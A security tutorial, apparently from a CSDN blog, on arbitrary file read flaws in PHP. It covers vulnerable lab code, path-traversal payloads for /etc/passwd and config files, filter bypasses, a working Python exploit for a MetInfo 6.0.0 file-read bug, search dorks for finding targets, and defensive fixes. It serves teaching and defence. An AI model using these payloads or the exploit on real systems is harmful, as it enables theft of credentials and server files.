Arbitrary file reading and vulnerability reproduction

Read any file

1 Overview

Some websites provide file viewing and downloading functions. If there are no restrictions on which files a user can view or download, or if those restrictions can be bypassed, any file on the server can be viewed or downloaded: code files, configuration files, sensitive files, etc.

  • Arbitrary file reading leads to disclosure of (sensitive) information.
  • Arbitrary file reading is mostly caused by other vulnerabilities, such as RCE, directory traversal, file inclusion, etc.
  • There is essentially no difference between reading any file and downloading any file: the information always flows from the server to the browser.

Reading and downloading any file may take different forms, but there is essentially no difference between them: from a permission perspective, both require read permission on the file.

1.1 Cause of vulnerability

Whether it is arbitrary file reading or arbitrary file downloading, the conditions that trigger the vulnerability are the same:

  • There is a file-reading function, that is, the web application exposes file reading;
  • The path of the file to read is controllable by the client, which fully controls or at least influences the file path parameter;
  • The file path is not verified, or the verification is not strict enough and can be bypassed;
  • The contents of the file are output.

1.2 Vulnerability hazards

Any server file can be downloaded, including source code files, sensitive system files, configuration files, etc.

It can be combined with other vulnerabilities to form a complete attack chain, for example by auditing the downloaded source code to find more vulnerabilities. The files of most interest for arbitrary file reading and downloading are:

  • source code
  • configuration files
  • sensitive documents
  • log files

1.3 Vulnerability classification

  • Read any file
  • Any file download

1.4 Read arbitrary files

1.4.1 File reading

Function             Characteristics
readfile()           Reads the file content directly; the output is built in
file_get_contents()  Reads the file content directly; the caller must output the returned content
fread()              Open file, calculate file size, read file, output file, close file

readfile:

<?php
// readfile.php
$fp = "../phpinfo.php";	// path: the location of phpinfo.php
readfile($fp);	// read the file at this path
?>

Create a new read_file folder in the phpStudy web root and a new file_read.php file in that folder, with the code above as its content. After saving, access the file:

http://192.168.16.136/read_file/file_read.php

The result is a blank page. Looking at the code, the contents of the file at the $fp path were read and returned as text, but not executed; the browser treats the returned source as HTML, so the <?php ... ?> block is not displayed.

file_get_contents:

<?php
// file_get_contents.php
$fp = "../phpinfo.php";
echo file_get_contents($fp);	// the returned content must be output explicitly
?>

Create a new file_get_contents.php file in the read_file folder, with the code above as its content. After saving, access the file:

http://192.168.16.136/read_file/file_get_contents.php

The result is again a blank page: the contents of the file at the $fp path were read, but not executed.

fread:

<?php
// fread.php
$fp = "../phpinfo.php";

$f = fopen($fp,'r');	// before reading, open the file at the path stored in $fp
$f_size = filesize($fp); 	// calculate the size of the file at this path
echo fread($f, $f_size); 	// read that many bytes from the opened file $f
fclose($f);		// close the file after reading, otherwise resources are wasted
?>

Create a new fread.php file in the read_file folder, with the code above as its content. After saving, access the file:

http://192.168.16.136/read_file/fread.php

The result is again a blank page: the contents of the file at the $fp path were read, but not executed.

1.4.2 Read arbitrary files

The variable $fp now takes the filepath parameter passed in the GET request:

<?php
//$fp = "../phpinfo.php";	// path: the location of phpinfo.php
$fp = @$_GET['filepath'];	// pass the data to $fp through the filepath parameter
readfile($fp);	// read the file at this path
?>

Accessing the page now gives an error because the filepath parameter is empty. Assign filepath=../phpinfo.php to the parameter.

Open the developer tools (F12) to see the parameters being loaded, and prefix the URL with view-source: so that the response is displayed as source code rather than rendered:

view-source:http://192.168.16.136/read_file/file_read.php?filepath=../phpinfo.php

The filepath is controllable by the client and is not verified, which causes an arbitrary file reading vulnerability. Examples:

?filepath=index.php
?filepath=/etc/passwd
?filepath=c:\windows\system32\drivers\etc\hosts
?filepath=c:\phpstudy_2016\apache\conf\httpd.conf
?filepath=c:\phpstudy_2016\mysql\my.ini
?filepath=../../../../../../../../../../phpstudy_2016/www/phpinfo.php
?filepath=../../../../../../../../windows\system32\drivers\etc\hosts
?filepath=../../../../../../etc/hosts

1.4.3 General permissions

  • Windows + IIS + ASP/ASPX: low privileges
  • Windows + Apache + PHP: high privileges
  • Windows + Java: definitely high privileges
  • Linux + Apache + PHP: low privileges
  • Linux + Nginx + PHP: not necessarily (may be higher or lower)
  • Linux + Java: definitely high privileges

1.5 Download any file

1.5.1 General situation

Direct download, e.g. "save image as".

Download via an <a> tag:

<a href="./a.jpg">IMG Download</a>

1.5.2 PHP implementation

PHP file download implementation process:

  • Read the file first
  • Then output the file
  • with headers that make the browser offer it for download

<?php
// file-download.php
$fp = './a.jpg';
header('Content-Type: image/jpeg');
header('Content-Disposition: attachment; filename=' . basename($fp));
readfile($fp);
?>

1.5.3 Download any file

Conditions for downloading any file:

  • The target file path is known
  • The target file path is client controllable
  • It is not verified, or the verification is not strict

Code with these conditions takes the path straight from the request:

$fp = $_GET['filepath'];

2. Arbitrary file reading attack and defense

2.1 Path filtering

2.1.1 Filter ../

<?php
//$fp = "../phpinfo.php";	// path: the location of phpinfo.php
$fp = @$_GET['filepath'];
$fp = str_replace("../","",$fp);    // replace ../ with an empty string
readfile($fp);	// read the file at this path
?>

Access:

view-source:http://192.168.16.136/read_file/file_read.php?filepath=....//phpinfo.php

The result was an error.

2.2 Simple bypass

2.2.1 Double-write bypass

Because str_replace() does not loop, removing the inner "../" from "..././" leaves "../" behind.

?filepath=..././..././..././..././..././windows\system32\drivers\etc\hosts

2.2.2 Absolute path

?filepath=c:/windows\system32\drivers\etc\hosts

2.2.3 Use ..\

?filepath=..\..\..\..\..\windows\system32\drivers\etc\hosts

2.2.4 Set whitelist

If only the three files a.php, b.php and c.php are allowed:

<?php
//$fp = "../phpinfo.php";	// path: the location of phpinfo.php
$fp = @$_GET['filepath'];
if($fp == 'a.php' or $fp == 'b.php' or $fp == 'c.php')
{
    readfile($fp);
}
else
{
    echo "Please stop!";
}
?>

3. Arbitrary file reading and mining

3.1 Manual discovery

Judging from the file name:

  • readfile.php
  • filedownload.php
  • filelist.php

Judging from the parameter name:

  • f=
  • file=
  • filepath=
  • fp=
  • readfile
  • path=
  • readpath
  • url=
  • menu=
  • META-INF=
  • WEB-INF=
  • content=

Where the above appear, an arbitrary file read may exist.

3.2 Classic cases

metinfo_6.0.0_file-read

3.2.1 Vulnerability description

MetInfo is a content management system developed with PHP and MySQL. An arbitrary file read vulnerability exists in the file /app/system/include/module/old_thumb.class.php in MetInfo version 6.0.0. An attacker could exploit the vulnerability to read sensitive files on the website.

3.2.2 Vulnerability level

high risk

3.2.3 Affected versions

  • MetInfo 6.0.0

3.2.4 Vulnerability recurrence

3.2.4.1 Basic environment

Component    Version
OS           Microsoft Windows Server 2016 Standard
Web Server   phpStudy 2016
MetInfo      6.0.0

3.2.4.2 Vulnerability points

Visit this link:

/include/thumb.php
http://192.168.16.136/metinfo_6.0.0/include/thumb.php

Use Burp Suite to capture the request; because Burp does not capture image requests by default, modify the Filter to include images.

Press Ctrl+R to send the packet to Repeater.

First test:

/include/thumb.php?dir=..././http/..././config/config_db.php

Attempt to read the database configuration file. Read failed.

Second test:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

Attempt to read the database configuration file. Read failed.

Third test:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

Attempt to read the database configuration file. Read failed.

Fourth test:

/include/thumb.php?dir=http\..\..\config\config_db.php

Attempt to read the database configuration file. Read succeeded.

Notice: this PoC only applies to Windows systems and is invalid on Linux systems.

3.2.4.3 Further exploitation

Writing the EXP:

import requests
import sys

banner = """
MetInfo 6.0.0
    ___________.__.__           __________                   .___
    \_   _____/|__|  |   ____   \______   \ ____ _____     __| _/
    |    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | 
    |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | 
    \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | 
        \/                 \/          \/     \/     \/      \/ 
                                                        - AJEST
Usage: python3 *.py http://192.168.16.136/metinfo_6.0.0
"""

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

# The four dir= values tried by hand above; only the last one worked on Windows.
dir_list = [
    "..././http/..././config/config_db.php",
    ".....///http/.....///config/config_db.php",
    "http/.....///.....///config/config_db.php",
    r"http\..\..\config\config_db.php",   # raw string so the backslashes stay literal
]

def attack(host):
    vul = "/include/thumb.php"
    url = host + vul

    # First confirm that the script exists at all.
    res = requests.get(url=url, headers=headers)
    if res.status_code != 200:
        print(f"[INFO] {vul} does not exist!")
        sys.exit()
    print(f"[INFO] {vul} exists!")

    for param in dir_list:
        params = {"dir": param}
        res = requests.get(url=url, params=params, headers=headers)
        print(f"[INFO] Test URL: {res.url}")

        # The config file comes back as source text, so "<?php" marks a successful read.
        if "<?php" in res.text:
            print("[RESULT] The target is vulnerable!")
            print(f"[RESULT]\n{res.text}")
            break

if len(sys.argv) < 2:
    print(banner)
    sys.exit()

host = sys.argv[1]
attack(host=host)

Create a new exp.py file in Kali, copy the content above into it, and run it with the CMS address as the argument:

sudo python3 *.py http://192.168.16.136/metinfo_6.0.0/

3.2.4.4 Fingerprint information

Traditional search engine:

Powered by MetInfo 6.0.0
intext:"Powered by MetInfo 6.0.0" inurl:"tw"

FLY:

app="metinfo"

ZoomEye:

app:"MetInfo"
app:"MetInfo"+os:"Windows"

3.2.4.5 Patch recommendations

  • Apply the patch
  • Upgrade
  • Deploy a protective device

4. Vulnerability fix plan

4.1 Input and output

Allow web users to access (read) only the required files and paths (whitelist).

4.2 Avoid other vulnerabilities

Other vulnerabilities may lead to arbitrary file read vulnerabilities: there must be no file inclusion, directory traversal or other such vulnerabilities in the application.

4.3 Limit file access scope

  • Prevent users from accessing paths outside the web root directory.

  • In the php.ini configuration file, the option open_basedir limits the directories PHP may access:

open_basedir = C:\phpStudy_20161103\WWW

When PHP then performs an arbitrary file read, file access is limited to this directory on the C drive.

Temporarily changing the php.ini configuration from within a script:

ini_set("open_basedir","C:\phpStudy_20161103\WWW");

But there is still a risk: other files cannot be read, but the script can still read itself, so all of the configuration information stored in it is exposed.

Therefore, filtering, whitelisting and restricting the file access scope must be used together.
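As an added example that is not part of the original post, the following PHP script puts the str_replace("../", "") filter from section 2.1.1 beside a containment check plus whitelist of the kind sections 4.1 and 4.3 recommend (the containment check is a code-level equivalent of open_basedir), and runs both against the bypass payloads from section 2.2. The sample directory tree, file names and function names are constructed for the demo.

```php
<?php
// Added example, not from the original post: the page's str_replace("../", "")
// filter beside a containment check plus whitelist, run against the bypass
// payloads from section 2.2. The sample tree below is constructed in a temp dir.

// The filter from section 2.1.1: strips "../" once, non-recursively.
function naive_filter(string $path): string {
    return str_replace("../", "", $path);
}

// Hardened reader: resolve the real path, require it to stay below $base
// (a code-level equivalent of open_basedir), then require a whitelist hit.
function safe_read(string $base, string $requested, array $allowed): ?string {
    $baseReal = realpath($base);
    // Reject NUL bytes and backslashes; on Windows "\" is also a separator.
    if ($baseReal === false || strpbrk($requested, "\0\\") !== false) {
        return null;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false) {
        return null;                                  // no such file
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                                  // escaped the web root
    }
    if (!in_array(basename($target), $allowed, true)) {
        return null;                                  // not on the whitelist
    }
    return file_get_contents($target);
}

// Constructed sample tree: <tmp>/www/a.php (allowed) and <tmp>/secret.ini (outside).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "read_file_demo_" . getmypid();
mkdir("$root/www", 0700, true);
file_put_contents("$root/www/a.php", "<?php echo 'a'; ?>");
file_put_contents("$root/secret.ini", "db_pass=constructed");

// The page's payloads: "..././" and "....//" both collapse to "../" after one str_replace.
foreach (["a.php", "../secret.ini", "..././secret.ini", "....//secret.ini"] as $p) {
    $seen = naive_filter($p);                       // what the filtered script would open
    $verdict = safe_read("$root/www", $p, ["a.php"]) === null ? "blocked" : "read";
    printf("%-18s naive filter opens: %-16s hardened: %s\n", $p, $seen, $verdict);
}

unlink("$root/www/a.php"); unlink("$root/secret.ini"); rmdir("$root/www"); rmdir($root);
```

Only a.php is read by the hardened version; the three traversal payloads are rejected by the prefix check even though the naive filter turns two of them into a plain "../secret.ini".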


Origin blog.csdn.net/weixin_58954236/article/details/132642938